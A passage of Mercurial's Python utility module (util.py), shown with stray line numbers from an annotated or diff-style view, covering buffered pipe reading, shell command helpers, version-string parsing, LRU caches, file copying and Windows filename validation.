        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        # delegate to the wrapped pipe
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        # fill until 'size' bytes are available or EOF, then hand them out;
        # may return fewer than 'size' bytes at end of stream
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        # lfi: index of the first newline in the most recent chunk, -1 if none
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        # keep reading until a newline shows up or the stream ends
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        # number of bytes to return, newline included
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            # collapse all chunks into one before slicing
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        # after this point the buffer holds at most one chunk
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        # unbuffered os.read so select()-style polling stays accurate
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)
413
413
def mmapread(fp):
    """Return a read-only mmap of *fp*'s whole content ('' for empty files).

    *fp* may be a file object (its fileno() is used) or a raw descriptor.
    """
    try:
        fileno = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fileno, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fileno).st_size == 0:
            return ''
        raise
424
424
def popen2(cmd, env=None, newlines=False):
    """Run *cmd* through the shell; return its (stdin, stdout) pipe pair."""
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    proc = subprocess.Popen(cmd,
                            shell=True,
                            bufsize=-1,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout
435
435
def popen3(cmd, env=None, newlines=False):
    """Like popen4, but return only (stdin, stdout, stderr), dropping the
    Popen object."""
    return popen4(cmd, env, newlines)[:3]
439
439
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Run *cmd* through the shell with all three std streams piped.

    Returns (stdin, stdout, stderr, popen-object).  ``newlines`` enables
    universal-newline (text) mode; ``bufsize`` is forwarded to Popen.
    """
    proc = subprocess.Popen(cmd,
                            shell=True,
                            bufsize=bufsize,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout, proc.stderr, proc
448
448
def version():
    """Return version information if available."""
    try:
        # the __version__ module is generated at build time and may be absent
        from . import __version__
    except ImportError:
        return 'unknown'
    return __version__.version
456
456
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # split off the "extra" part at the first '+' or '-'; raw string so the
    # escaped '+' is a regex escape, not an (invalid) string escape
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    # numeric components; stop at the first non-integer piece
    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
    # any other n falls through and returns None implicitly
525
525
# used by parsedate
# Ordered list of strptime() patterns tried when parsing a user-supplied
# date; the first matching format wins.
defaultdateformats = (
    '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
    '%Y-%m-%dT%H:%M',    #   without seconds
    '%Y-%m-%dT%H%M%S',   # another awful but legal variant without :
    '%Y-%m-%dT%H%M',     #   without seconds
    '%Y-%m-%d %H:%M:%S', # our common legal variant
    '%Y-%m-%d %H:%M',    #   without seconds
    '%Y-%m-%d %H%M%S',   # without :
    '%Y-%m-%d %H%M',     #   without seconds
    '%Y-%m-%d %I:%M:%S%p',
    '%Y-%m-%d %H:%M',
    '%Y-%m-%d %I:%M%p',
    '%Y-%m-%d',
    '%m-%d',
    '%m/%d',
    '%m/%d/%y',
    '%m/%d/%Y',
    '%a %b %d %H:%M:%S %Y',
    '%a %b %d %I:%M:%S%p %Y',
    '%a, %d %b %Y %H:%M:%S',  #  GNU coreutils "/bin/date --rfc-2822"
    '%b %d %H:%M:%S %Y',
    '%b %d %I:%M:%S%p %Y',
    '%b %d %H:%M:%S',
    '%b %d %I:%M:%S%p',
    '%b %d %H:%M',
    '%b %d %I:%M%p',
    '%b %d %Y',
    '%b %d',
    '%H:%M:%S',
    '%I:%M:%S%p',
    '%H:%M',
    '%I:%M%p',
)
560
560
# Superset of defaultdateformats that also accepts coarse-grained dates
# (year only, year-month, month name...), used where ambiguity is acceptable.
extendeddateformats = defaultdateformats + (
    "%Y",
    "%Y-%m",
    "%b",
    "%b %Y",
)
567
567
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # a one-slot list doubles as the "computed yet?" flag
        results = []
        def wrapper():
            if not results:
                results.append(func())
            return results[0]
        return wrapper
    memo = {}
    if argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def wrapper(arg):
            if arg not in memo:
                memo[arg] = func(arg)
            return memo[arg]
    else:
        def wrapper(*args):
            if args not in memo:
                memo[args] = func(*args)
            return memo[args]

    return wrapper
593
593
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        pending = getattr(self, '_copied', 0)
        if pending:
            # someone still shares us: hand them this object and give the
            # writer a fresh copy
            self._copied = pending - 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        # just count outstanding shares; real copying is deferred to
        # preparewrite
        self._copied = getattr(self, '_copied', 0) + 1
        return self
611
611
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # unlike plain OrderedDict, re-assigning an existing key moves it
        # to the end (last-set order)
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
636
636
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
    # no body: all behavior comes from the cow mixin plus dict
662
662
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """
    # no body: all behavior comes from the cow mixin plus sortdict
668
668
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    # Python 2-style metaclass declaration (a plain attribute on Python 3)
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            # commit only on a clean exit; an in-flight exception skips close()
            if exc_type is None:
                self.close()
        finally:
            # always release, so an unclosed transaction gets aborted
            self.release()
693
693
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # keep the work done so far, then re-raise so the caller can ask
        # the user to intervene
        tr.close()
        raise
    finally:
        # release aborts the transaction unless close() already ran
        tr.release()
711
711
@contextlib.contextmanager
def nullcontextmanager():
    # a no-op context manager, for callers that need a 'with' target but
    # have nothing to manage
    yield
715
715
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    # slots: these nodes exist in bulk, avoid a per-instance __dict__
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        # not yet linked into any list
        self.next = None
        self.prev = None

        # _notset (module-level sentinel) marks a node with no entry
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
734
734
735 class lrucachedict(object):
735 class lrucachedict(object):
736 """Dict that caches most recent accesses and sets.
736 """Dict that caches most recent accesses and sets.
737
737
738 The dict consists of an actual backing dict - indexed by original
738 The dict consists of an actual backing dict - indexed by original
739 key - and a doubly linked circular list defining the order of entries in
739 key - and a doubly linked circular list defining the order of entries in
740 the cache.
740 the cache.
741
741
742 The head node is the newest entry in the cache. If the cache is full,
742 The head node is the newest entry in the cache. If the cache is full,
743 we recycle head.prev and make it the new head. Cache accesses result in
743 we recycle head.prev and make it the new head. Cache accesses result in
744 the node being moved to before the existing head and being marked as the
744 the node being moved to before the existing head and being marked as the
745 new head node.
745 new head node.
746 """
746 """
    def __init__(self, max):
        # key -> _lrucachenode for O(1) lookup
        self._cache = {}

        # Start with a single node that is its own neighbour: a circular
        # doubly linked list of length one.  More nodes are allocated
        # lazily (via _addcapacity) as entries are inserted.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        # number of allocated nodes (not live entries); grows up to max
        self._size = 1
        self._capacity = max
755
755
    def __len__(self):
        # count live entries, not allocated linked-list nodes
        return len(self._cache)
758
758
    def __contains__(self, k):
        # membership testing does not refresh the entry's LRU position
        return k in self._cache
761
761
762 def __iter__(self):
762 def __iter__(self):
763 # We don't have to iterate in cache order, but why not.
763 # We don't have to iterate in cache order, but why not.
764 n = self._head
764 n = self._head
765 for i in range(len(self._cache)):
765 for i in range(len(self._cache)):
766 yield n.key
766 yield n.key
767 n = n.next
767 n = n.next
768
768
    def __getitem__(self, k):
        # dict semantics: missing keys raise KeyError (from self._cache)
        node = self._cache[k]
        # a hit makes this entry the most recently used
        self._movetohead(node)
        return node.value
773
773
    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            # still room: allocate a fresh node (comes back as head.prev)
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node
798
798
    def __delitem__(self, k):
        # raises KeyError if k is absent (dict semantics via pop)
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next
807
807
808 # Additional dict methods.
808 # Additional dict methods.
809
809
810 def get(self, k, default=None):
810 def get(self, k, default=None):
811 try:
811 try:
812 return self._cache[k].value
812 return self._cache[k].value
813 except KeyError:
813 except KeyError:
814 return default
814 return default
815
815
    def clear(self):
        # empty every node in place; the linked list itself is kept so the
        # allocated capacity can be reused
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()
823
823
    def copy(self):
        # build a fresh cache with the same capacity and entries
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result
832
832
    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node
879
879
880 def _addcapacity(self):
880 def _addcapacity(self):
881 """Add a node to the circular linked list.
881 """Add a node to the circular linked list.
882
882
883 The new node is inserted before the head node.
883 The new node is inserted before the head node.
884 """
884 """
885 head = self._head
885 head = self._head
886 node = _lrucachenode()
886 node = _lrucachenode()
887 head.prev.next = node
887 head.prev.next = node
888 node.prev = head.prev
888 node.prev = head.prev
889 node.next = head
889 node.next = head
890 head.prev = node
890 head.prev = node
891 self._size += 1
891 self._size += 1
892 return node
892 return node
893
893
def lrucachefunc(func, maxsize=20):
    '''cache most recent results of function calls

    Up to roughly ``maxsize`` results are retained; once the cache grows
    past that bound, the least-recently-used entry is evicted.  The bound
    was previously hard-coded to 20; it is now a parameter with the same
    default, so existing callers are unaffected.
    '''
    cache = {}
    # deque of keys in least- to most-recently-used order
    order = collections.deque()
    # single-argument functions are cached on the bare argument so the
    # key is hashable without tuple wrapping
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                # NOTE: eviction triggers only once len(cache) exceeds
                # maxsize, matching the original "> 20" behavior
                if len(cache) > maxsize:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > maxsize:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f
920
920
class propertycache(object):
    """Descriptor computing a value on first attribute access, then caching.

    The computed value is written into the instance ``__dict__`` under the
    wrapped function's name, so subsequent reads bypass the descriptor.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
933
933
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    # stderr is not captured; only stdout is returned to the caller
    out, _err = proc.communicate(s)
    return out
940
940
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        # on OpenVMS, bit 0 set in the exit status indicates success
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # best-effort cleanup of both temporary files; removal failures
        # are deliberately ignored
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass
974
974
# Maps a filter-command prefix to the function implementing that
# mechanism; consulted by filter() below.
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}
979
979
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    # a recognized prefix (e.g. 'tempfile:' or 'pipe:') selects the
    # filtering mechanism; without one, default to a pipe
    for name, fn in filtertable.iteritems():
        if cmd.startswith(name):
            return fn(s, cmd[len(name):].lstrip())
    return pipefilter(s, cmd)
986
986
def binary(s):
    """return true if a string is binary data"""
    # empty/None input is never considered binary; otherwise the presence
    # of a NUL byte is the heuristic
    if not s:
        return False
    return '\0' in s
990
990
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        # floor(log2(x)) for positive x; 0 for x == 0 (never hit here,
        # since it is only called with an accumulated length >= min >= 1)
        if not x:
            return 0
        return x.bit_length() - 1

    pending = []
    pendinglen = 0
    for piece in source:
        pending.append(piece)
        pendinglen += len(piece)
        if pendinglen >= min:
            if min < max:
                # double the threshold, or jump straight to the largest
                # power of two not exceeding what we just accumulated,
                # capped at max
                min = min << 1
                nmin = 1 << log2(pendinglen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(pending)
            pendinglen = 0
            pending = []
    # flush whatever is left, even if below the threshold
    if pending:
        yield ''.join(pending)
1021
1021
# Module-level alias of error.Abort, used throughout this file.
Abort = error.Abort
1023
1023
def always(fn):
    """Return True regardless of *fn*."""
    return True
1026
1026
def never(fn):
    """Return False regardless of *fn*."""
    return False
1029
1029
def nogc(func):
    """Decorator disabling the garbage collector around *func*.

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking
    has no effect on when GCs are triggered, only on what objects the GC
    looks into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # restore collection only if it was on when we were called
            if wasenabled:
                gc.enable()
    return wrapper
1052
1052
if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    # so make nogc an identity (no-op) decorator there
    nogc = lambda x: x
1056
1056
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        # n1 is absolute and on a different drive than root: a relative
        # path cannot cross drives, so return an absolute path instead
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    # strip the common prefix of both paths
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    # climb out of what remains of n1, then descend into n2
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1082
1082
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    # each freezing tool leaves a different marker on sys
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze
1092
1092
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

# point the translation machinery at the data directory just computed
i18n.setdatapath(datapath)
1101
1101
# cached path of the 'hg' executable; lazily populated by hgexecutable()
_hgexecutable = None
1103
1103
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            # explicit override via the HG environment variable
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            # running directly from an 'hg' script
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            # last resort: search PATH, falling back to argv[0]'s basename
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1127
1127
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    # stores into the module-level cache consumed by hgexecutable()
    global _hgexecutable
    _hgexecutable = path
1132
1132
def _isstdout(f):
    """Return a truthy value iff *f* is wired to the process's real stdout.

    Objects without a ``fileno`` method yield a falsy result (the missing
    attribute itself, i.e. None), matching the original short-circuit.
    """
    fileno = getattr(f, 'fileno', None)
    if not fileno:
        return fileno
    return fileno() == sys.__stdout__.fileno()
1136
1136
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        # None/False become '0', True becomes '1', everything else str()
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return str(val)
    env = dict(encoding.environ)
    if environ:
        env.update((k, py2shell(v)) for k, v in environ.iteritems())
    # expose the path of the running hg to child commands
    env['HG'] = hgexecutable()
    return env
1151
1151
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    try:
        # flush pending output so the child's output interleaves correctly
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        # output goes straight to our stdout; no need to capture it
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        # capture combined stdout+stderr and forward it line by line
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    # on OpenVMS, bit 0 set in the exit status indicates success
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc
1178
1178
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # translate the TypeError into SignatureError only when it was
            # raised by the call itself (traceback depth of exactly 1),
            # not by code inside func
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check
1190
1190
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1205
1205
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one;
                    # advance mtime by one second (clamped to 31 bits) to
                    # disambiguate
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))
1257
1257
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible.

    Returns a (hardlink, num) pair: whether hardlinking was (still) in
    effect at the end, and how many files were processed.
    """
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # only attempt hardlinks when src and dst's parent share a device
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # offset child progress by the files already processed
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # hardlinking failed; copy this and all remaining files
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    # signal completion of this (sub)tree
    progress(topic, None)

    return hardlink, num
1297
1297
# Windows reserved device names; using one as a filename base is invalid
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
# characters that may not appear in Windows filenames
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    # examine each path component, treating '\' and '/' as separators
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
